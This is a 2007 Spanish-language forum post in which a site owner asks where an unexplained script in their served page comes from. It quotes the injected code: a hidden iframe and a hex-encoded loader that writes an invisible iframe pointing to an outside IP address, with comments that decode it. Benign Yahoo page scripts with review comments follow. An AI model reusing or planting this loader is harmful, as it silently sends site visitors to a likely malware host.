
21/12/2007, 10:32
javascript malicioso yahoo
Hola,
quisiera orientación sobre un código que se ha agregado a mi página; aparece solo cuando carga, porque en mi código no está. Parte del código es el siguiente. Por favor, si alguien sabe de dónde podría venir ese código malicioso, que me lo diga, porque no tengo la menor idea de por qué salió.
Cuando veo el código fuente de la página, se ve esto al final de todo:
Código:
<iframe src='http://url' width='1' height='1' style='visibility: hidden;'></iframe>
<script>
// Injected loader, quoted as found. The line below is kept byte-identical so it can still be
// compared against other samples; only these comments are added.
//
// v47654ff8e3f0c(x)  - returns parseInt(x, 16): one hex string turned into a number.
// v47654ff8e4ea9(s)  - walks s two characters at a time (the inner helper v47654ff8e5e33 always
//                      returns 2), converts each hex pair with String.fromCharCode and returns
//                      the concatenated text. Its loop counter v47654ff8e5a4d is never declared,
//                      so it is created as a global.
// The decoded text is handed straight to document.write, so the browser parses it as markup
// while the page is loading.
//
// Decoding the hex literal statically (no execution needed) gives a <SCRIPT> element that sets
// window.status to 'Done' and document.write()s an <iframe name=2 width=648 height=399> styled
// "display: none" whose src is built as
//   hxxp://77[.]221[.]133[.]188/.if/go.html? + Math.round(Math.random()*258552) + '395e8a16'
// (address defanged in this comment). The status-bar text presumably makes the load look finished.
//
// NOTE(review): the poster reports that this markup is absent from their own source and appears
// only in the served page; where it is added (stored file, server-side include, or in transit)
// cannot be determined from this listing.
function v47654ff8e3f0c(v47654ff8e42ef){ return(parseInt(v47654ff8e42ef,16));}function v47654ff8e4ea9(v47654ff8e527d){ function v47654ff8e5e33 () {var v47654ff8e621d=2; return v47654ff8e621d;} var v47654ff8e5666='';for(v47654ff8e5a4d=0; v47654ff8e5a4d<v47654ff8e527d.length; v47654ff8e5a4d+=v47654ff8e5e33()){ v47654ff8e5666+=(String.fromCharCode(v47654ff8e3f0c(v47654ff8e527d.substr(v47654ff8e5a4d, v47654ff8e5e33()))));}return v47654ff8e5666;} document.write(v47654ff8e4ea9('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D32207372633D5C27687474703A2F2F37372E3232312E3133332E3138382F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A323538353532292B2733393565386131365C272077696474683D363438206865696768743D333939207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E'));
</script>
Y al ver el código JavaScript en Mozilla, entre otras cosas, se ve lo siguiente:
Código:
_lcs = decodeURIComponent(_lcs);
// Root object of the library: reuse window.YAHOO when it already exists, otherwise start empty.
var YAHOO = window.YAHOO || {};

/**
 * Returns the nested object named by a dotted path under YAHOO, creating every
 * missing level on the way. A leading "YAHOO" segment is skipped.
 *
 * @param {string} ns - dotted path such as "util" or "YAHOO.util".
 * @returns {Object|null} the innermost object, or null when ns is empty/falsy.
 */
YAHOO.namespace = function (ns) {
  if (!ns || !ns.length) {
    return null;
  }

  var segments = ns.split(".");
  var node = YAHOO;
  var idx = (segments[0] == "YAHOO") ? 1 : 0;

  while (idx < segments.length) {
    var key = segments[idx];
    node[key] = node[key] || {};
    node = node[key];
    ++idx;
  }
  return node;
};

/**
 * Forwards its three arguments to YAHOO.widget.Logger.log when that logger is present.
 *
 * @returns {*} whatever Logger.log returns, or false when no logger is available.
 */
YAHOO.log = function (_5, _6, _7) {
  var logger = YAHOO.widget.Logger;
  if (!(logger && logger.log)) {
    return false;
  }
  return logger.log(_5, _6, _7);
};

/**
 * Wires prototype inheritance: _9 becomes a subclass of _10.
 *
 * @param {Function} _9  - constructor that receives the new prototype chain.
 * @param {Function} _10 - constructor whose prototype is inherited.
 */
YAHOO.extend = function (_9, _10) {
  // An empty intermediate constructor links the prototypes without running _10 itself.
  var bridge = function () {};
  bridge.prototype = _10.prototype;

  _9.prototype = new bridge();
  _9.prototype.constructor = _9;
  _9.superclass = _10.prototype;

  // If the parent prototype still reports Object as its constructor, point it back at _10.
  if (_10.prototype.constructor == Object.prototype.constructor) {
    _10.prototype.constructor = _10;
  }
};

// Namespaces created up front.
YAHOO.namespace("util");
YAHOO.namespace("widget");
YAHOO.namespace("example");
// Page-level namespaces.
YAHOO.namespace("Fd");
YAHOO.namespace("Fp");

// Available screen width as a number, or false when the browser does not report one.
if (screen && typeof screen.availWidth == 'number') {
  YAHOO.Fp.nScreenWidth = screen.availWidth;
} else {
  YAHOO.Fp.nScreenWidth = false;
}

// 1 = width below 1024, 0 = 1024 or wider, -1 = width unknown (or reported as 0).
if (!YAHOO.Fp.nScreenWidth) {
  YAHOO.Fp.bNarrow = -1;
} else if (YAHOO.Fp.nScreenWidth < 1024) {
  YAHOO.Fp.bNarrow = 1;
} else {
  YAHOO.Fp.bNarrow = 0;
}

YAHOO.Fp.d = document;

/**
 * Shorthand element lookup.
 *
 * @param {string} id - element id.
 * @returns {*} the result of getElementById(id), or false when id is not a string.
 */
YAHOO.Fp.$ = function (id) {
  if (typeof id != 'string') {
    return false;
  }
  return YAHOO.Fp.d.getElementById(id);
};

YAHOO.Fp._hostname = location.hostname;
/**
 * Fires a tracking request by assigning a URL to an off-screen Image.
 *
 * The request URL is sUrl followed by '/*-http://<hostname>/iv.gif?t=<timestamp>'.
 * All parts are concatenated without encoding.
 *
 * @param {string} sUrl     - beacon target; when it does not contain 'http' and
 *                            YAHOO.Fp._ylh is non-empty it may be prefixed with '/' + YLH + '/'.
 * @param {*}      clearUlt - truthy: first overwrite cookie "D" with an empty value
 *                            and expiry "-1" on domain yahoo.com.
 * @param {*}      useYlh   - truthy: apply the YLH prefix even without clearUlt.
 */
YAHOO.Fp.beacon = function (sUrl, clearUlt, useYlh) {
  var target = sUrl;
  var isRelative = target.indexOf('http') < 0;

  if (isRelative && YAHOO.Fp._ylh != '') {
    if (clearUlt) {
      YAHOO.cookie.set("D", "", "-1", "/", "yahoo.com");
    }
    if ((clearUlt || useYlh) && YLH) {
      target = '/' + YLH + '/' + target;
    }
  }

  var oImage = new Image();
  var stamp = new Date().getTime();
  oImage.src = target + '/*-http://' + YAHOO.Fp._hostname + '/iv.gif?t=' + stamp;

  // Drop the reference after ten seconds.
  setTimeout(function () {
    oImage = null;
  }, 1e4);
};

// Alias under the misspelled name "becon".
YAHOO.Fp.becon = YAHOO.Fp.beacon;
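/**
 * Minimal cookie helper built on document.cookie, with support for
 * '&'-separated "key=value" sub-fields stored inside one cookie.
 *
 * Review notes:
 *  - set() writes only expires, path and domain; no "secure" attribute is emitted,
 *    and every cookie written here is readable by any script running in the page.
 *  - get() decodes with unescape() but set() writes the value unencoded, so a value
 *    containing ';' or '=' is not round-tripped safely.
 */
YAHOO.cookie = {
  /**
   * Reads a cookie.
   *
   * @param {string} n - cookie name.
   * @returns {string} the unescape()d value, or '' when the cookie is absent.
   */
  get: function (n) {
    var v = '',
        // Leading space and trailing ';' so that ' name=' and the closing ';' can
        // be searched for uniformly, including for the first and last cookie.
        c = ' ' + document.cookie + ';',
        s = c.indexOf((' ' + n + '='));
    if (s >= 0) {
      s += n.length + 2;
      v = unescape(c.substring(s, c.indexOf(';', s)));
    }
    return v;
  },

  /**
   * Writes a cookie. Optional positional arguments after (n, v):
   *   [2] expires - Date-like object (toGMTString is called on it) or a number that is
   *                 multiplied by 1000 and passed to new Date(); omitted when empty.
   *   [3] path    - defaults to "/".
   *   [4] domain  - defaults to "www.yahoo.com".
   *
   * @param {string} n - cookie name.
   * @param {string} v - cookie value, written as-is (not encoded).
   */
  set: function (n, v) {
    var a = arguments, al = a.length;
    var expires = "";
    if (al > 2 && a[2] != "") {
      var when = (typeof(a[2]) == "object") ? a[2] : new Date(a[2] * 1000);
      expires = ";expires=" + when.toGMTString();
    }
    var path = (al > 3 && a[3] != "") ? a[3] : "/";
    var domain = (al > 4 && a[4] != "") ? a[4] : "www.yahoo.com";
    document.cookie = n + "=" + v + expires + ";path=" + path + ";domain=" + domain;
  },

  /**
   * Locates sub-field s inside a cookie value.
   *
   * @param {string} sCookie - raw cookie value.
   * @param {string} s       - sub-field key.
   * @returns {number} for a multi-part value, the index of the part whose key equals s;
   *                   for a single-part value, sCookie.indexOf(s); -1 when not found.
   */
  checksub: function (sCookie, s) {
    var aParts = sCookie.split('&'), nParts = aParts.length, aKeyVal;
    if (nParts == 1) {
      // NOTE(review): this is a character offset, not a part index. getsub() and setsub()
      // use the result as an index into split('&'), which only holds for offset 0.
      return sCookie.indexOf(s);
    } else {
      for (var i = 0; i < nParts; i++) {
        aKeyVal = aParts[i].split('=');
        if (aKeyVal[0] == s) {
          return i;
        }
      }
    }
    return -1;
  },

  /**
   * Reads sub-field s of cookie n.
   *
   * @param {string} n - cookie name.
   * @param {string} s - sub-field key.
   * @returns {string} the sub-field value, or '' when it is not present.
   */
  getsub: function (n, s) {
    var sCookie = this.get(n);
    var nExists = this.checksub(sCookie, s);
    if (nExists > -1) {
      return sCookie.split('&')[nExists].split('=')[1];
    } else if (sCookie.indexOf(s) > 0) {
      return sCookie.split('=')[1];
    }
    return '';
  },

  /**
   * Sets sub-field s of cookie n to v, keeping the other sub-fields, then rewrites the
   * cookie through set(). Optional positional arguments [3] expires, [4] path and
   * [5] domain are forwarded to set() with defaults '', '/' and 'www.yahoo.com'.
   *
   * @param {string} n - cookie name.
   * @param {string} s - sub-field key.
   * @param {string} v - sub-field value.
   * @returns {undefined} the return value of set().
   */
  setsub: function (n, s, v) {
    var sCookie = this.get(n), a = arguments;
    var aParts = sCookie.split('&');
    var nExists = this.checksub(sCookie, s);
    // Declared locally: the original assigned sNewVal without var, which created a
    // global and throws a ReferenceError in strict mode.
    var sNewVal;
    if (sCookie == '') {
      sNewVal = (s + '=' + v).toString();
    } else {
      if (nExists == -1) { nExists = aParts.length; }
      aParts[nExists] = s + '=' + v;
      sNewVal = aParts.join('&');
    }
    return this.set(n, sNewVal, (a[3] || ''), (a[4] || '/'), (a[5] || 'www.yahoo.com'));
  }
};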
/**
 * Reloads the current path via location.replace, optionally tagging it with '?rs=1'.
 *
 * With a truthy bCheck the reload is skipped when the query string already has 'rs='
 * directly after the '?' or when the path contains 'cgi'; otherwise an image request
 * is sent to www.yahoo.com first. With a falsy bCheck the page is always reloaded
 * without the query string.
 *
 * @param {*} bCheck - truthy to apply the checks and append '?rs=1'.
 */
YAHOO.Fp.changePageSize = function (bCheck) {
  var hasRsFlag = location.search.indexOf('rs=') == 1;
  var isCgiPath = location.pathname.indexOf('cgi') >= 0;

  if (bCheck && (hasRsFlag || isCgiPath)) {
    return;
  }

  var suffix = '';
  if (bCheck) {
    var bcn = new Image;
    bcn.src = 'http://www.yahoo.com/' + (ylp || 'p.gif') + '&igpv=1';
    suffix = '?rs=1';
  }

  location.replace('http://' + location.hostname + location.pathname + suffix);
};
// Page-size preference: "dl" is the value hard-coded on this page, sFsCookie is what the
// "FPS" cookie currently holds.
YAHOO.Fp.sPhpFsCookie = "dl";
YAHOO.Fp.sFsCookie = YAHOO.cookie.get("FPS");

if (YAHOO.Fp.bNarrow != -1 && YAHOO.Fp.sFsCookie.indexOf("t") != 0) {
  // Cookie does not start with "t" and the screen width is known:
  // store "ds" for narrow screens, "dl" otherwise.
  YAHOO.cookie.set("FPS", YAHOO.Fp.bNarrow ? "ds" : "dl", 400 * 3600000);
  if (YAHOO.Fp.bNarrow == 1) {
    YAHOO.Fp.changePageSize(1);
  }
} else if (YAHOO.Fp.sFsCookie != YAHOO.Fp.sPhpFsCookie) {
  // Stored preference differs from the page's own value.
  YAHOO.Fp.changePageSize(1);
}
/**
 * Stores sSize in the "FPS" cookie and reloads the page without the bCheck logic.
 *
 * @param {string} sSize - value to store in the "FPS" cookie.
 */
YAHOO.Fp.togglePageSize = function (sSize) {
  var expires = 400 * 3600000;
  YAHOO.cookie.set("FPS", sSize, expires);
  YAHOO.Fp.changePageSize(0);
};
YAHOO.Fp.nPageSize = 0;

// Browser flags and versions, written as literals in the served page.
// The second argument to parseFloat is ignored by the language.
YAHOO.Fp._ie55 = 0;
YAHOO.Fp._ie7 = 0;
YAHOO.Fp._ie = 0;
YAHOO.Fp._ff = 1;
YAHOO.Fp._ffv = parseFloat("2.0.0", 10);
YAHOO.Fp._ns = 0;
YAHOO.Fp._nsv = parseFloat("0", 10);
YAHOO.Fp._sf = 0;
YAHOO.Fp._sfv = parseFloat("0", 10);
YAHOO.Fp._op = 0;
YAHOO.Fp._mac = 0;

// YLH followed by '/' when the global YLH exists, otherwise an empty string.
if (typeof YLH != 'undefined') {
  YAHOO.Fp._ylh = YLH + '/';
} else {
  YAHOO.Fp._ylh = '';
}
Última edición por luz506; 21/12/2007 a las 10:42 |